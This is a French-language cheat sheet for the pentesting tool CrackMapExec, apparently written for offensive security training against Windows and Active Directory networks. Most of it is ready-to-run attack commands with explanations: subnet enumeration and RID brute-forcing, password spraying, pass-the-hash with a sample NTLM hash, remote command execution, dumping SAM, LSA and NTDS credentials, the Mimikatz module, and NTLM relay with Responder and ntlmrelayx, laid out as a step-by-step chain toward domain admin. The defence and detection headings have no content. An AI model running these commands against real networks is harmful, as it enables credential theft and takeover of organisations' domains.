CrackMapExec

📋 Fiche Outil : CrackMapExec (CME)

crackmapexec <protocole> <cible> [options]

Paramètres (Flags)

Commandes Essentielles

Exemples Pratiques

1. Découverte et énumération réseau (sans credentials)

Scan d’un sous-réseau pour identifier les machines Windows et leurs infos SMB.

crackmapexec smb 192.168.1.0/24

_Explication : Scanne tout le sous-réseau en SMB. Affiche le nom de la machine, le domaine, la version de Windows et si SMB signing est activé._

crackmapexec smb 192.168.1.100 --shares --users --rid-brute

_Explication : Tente d’énumérer les partages, utilisateurs et effectue un RID cycling sur la cible, le tout sans credentials (null session). Toutes les machines ne le permettent pas._

2. Password Spraying sur un domaine

Test d’un mot de passe unique contre une liste d’utilisateurs pour trouver un accès initial.

crackmapexec smb 10.10.10.5 -u users.txt -p 'Welcome2024!' -d CORP.LOCAL --continue-on-success

_Explication : Teste le mot de passe Welcome2024! pour chaque utilisateur du fichier users.txt sur le domaine CORP.LOCAL. L’option --continue-on-success évite de s’arrêter au premier match. Un [+] vert indique un login valide, et (Pwn3d!) signifie que l’utilisateur a des droits admin local._

3. Pass-the-Hash et exécution de commandes

Utilisation d’un hash NTLM récupéré pour se latéraliser via WinRM.

crackmapexec winrm 10.10.10.5 -u 'administrator' -H 'aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99' -d 'CORP.LOCAL'

_Explication : Authentification sur WinRM en Pass-the-Hash. Si (Pwn3d!) apparaît, on peut exécuter des commandes à distance._

crackmapexec smb 10.10.10.5 -u admin -p 'Password1' -x "whoami /all"

_Explication : Exécute la commande whoami /all via SMB sur la cible avec les credentials fournis._

4. Dump de credentials

Extraction de hash depuis la SAM, les secrets LSA ou la base NTDS (sur un DC).

# Dump SAM (hash locaux)
crackmapexec smb 192.168.1.100 -u admin -p 'Password1' --sam

# Dump LSA (secrets, comptes de service)
crackmapexec smb 192.168.1.100 -u admin -p 'Password1' --lsa

# Dump NTDS (tous les hash du domaine — uniquement sur un Domain Controller)
crackmapexec smb 10.10.10.5 -u admin -p 'Password1' --ntds

_Explication : --sam récupère les hash de la base SAM locale. --lsa extrait les secrets LSA (mots de passe en clair possibles, comptes machine). --ntds dump l’intégralité de la base Active Directory — extrêmement critique, nécessite des droits Domain Admin._

5. Génération de liste pour NTLM Relay

Créer un fichier de cibles vulnérables au NTLM relay (SMB signing désactivé).

crackmapexec smb --gen-relay-list smb_targets.txt 10.10.11.0/24

_Explication : Scanne le sous-réseau et identifie les machines avec SMB signing désactivé. Ces machines sont vulnérables au NTLM relay. Le résultat est sauvegardé dans smb_targets.txt._

Fonctionnalités Avancées

Protocoles disponibles

Modules post-exploitation

CME dispose de modules chargeables avec -M. Lister les modules disponibles :

crackmapexec smb -L

Modules notables :

# Mimikatz — extraction de credentials en mémoire
crackmapexec smb 192.168.1.0/24 -u admin -p 'pass' -M mimikatz

# Spider_plus — recherche de fichiers sensibles dans les partages
crackmapexec smb 192.168.1.100 -u admin -p 'pass' -M spider_plus

# WebDAV — énumération des services WebDAV
crackmapexec smb 192.168.1.0/24 -u admin -p 'pass' -M webdav

Base de données intégrée (cmedb)

CME stocke automatiquement tous les résultats dans une base SQLite locale. On peut la requêter avec cmedb :

cmedb
# Puis dans le shell interactif :
proto smb
creds
hosts

_Explication : Permet de retrouver les credentials et machines découverts lors de sessions précédentes sans relancer les scans._

Suivi & Recommandation

Étape 1 — Découverte réseau et identification des cibles.

crackmapexec smb 10.10.10.0/24

Étape 2 — Énumération sans credentials (null session, RID brute).

crackmapexec smb 10.10.10.5 --shares --users --rid-brute --pass-pol

Étape 3 — Password spraying avec les utilisateurs découverts.

crackmapexec smb 10.10.10.5 -u users.txt -p 'Password123!' -d CORP --continue-on-success

Étape 4 — Avec des credentials valides, énumérer en profondeur.

crackmapexec smb 10.10.10.0/24 -u user1 -p 'pass' --shares --sessions

Étape 5 — Mouvement latéral et dump de credentials.

crackmapexec smb 10.10.10.0/24 -u admin -p 'pass' --sam --lsa

Étape 6 — (Optionnel) Génération de liste pour NTLM relay.

# Génère la liste de cibles vulnérables
crackmapexec smb --gen-relay-list smb_targets.txt 10.10.10.0/24

# Lance ntlmrelayx avec la liste
sudo ntlmrelayx.py -tf smb_targets.txt -smb2support

# Lance Responder sur l'interface réseau
sudo responder -I eth0

Combinaisons Utiles

# 1. Capturer des hash NTLM avec Responder
sudo responder -I eth0

# 2. Relayer vers les cibles vulnérables identifiées par CME
sudo ntlmrelayx.py -tf smb_targets.txt -smb2support

# 3. Utiliser les credentials récupérés pour mouvement latéral
crackmapexec smb 10.10.10.0/24 -u admin -H <hash_récupéré> --sam

# Coupler CME + BloodHound pour cartographier les chemins d'attaque
crackmapexec smb 10.10.10.5 -u user -p 'pass' --ntds
# Puis importer les hash dans BloodHound pour visualiser les chemins vers Domain Admin

# Enrichir l'info sur les cibles
crackmapexec smb 192.168.1.0/24 --shares --users
crackmapexec smb 192.168.1.0/24 -u admin -p 'pass' -M spider_plus

Cas Particuliers & Pièges

Défense & Ressources

Contre-mesures & Détection

Installation

# Préinstallé sur Kali Linux
# Sinon :
sudo apt install crackmapexec

# Ou via pipx (recommandé pour éviter les conflits)
pipx install crackmapexec

# Successeur NetExec (recommandé)
pipx install netexec

Équivalent Windows

Liens & Ressources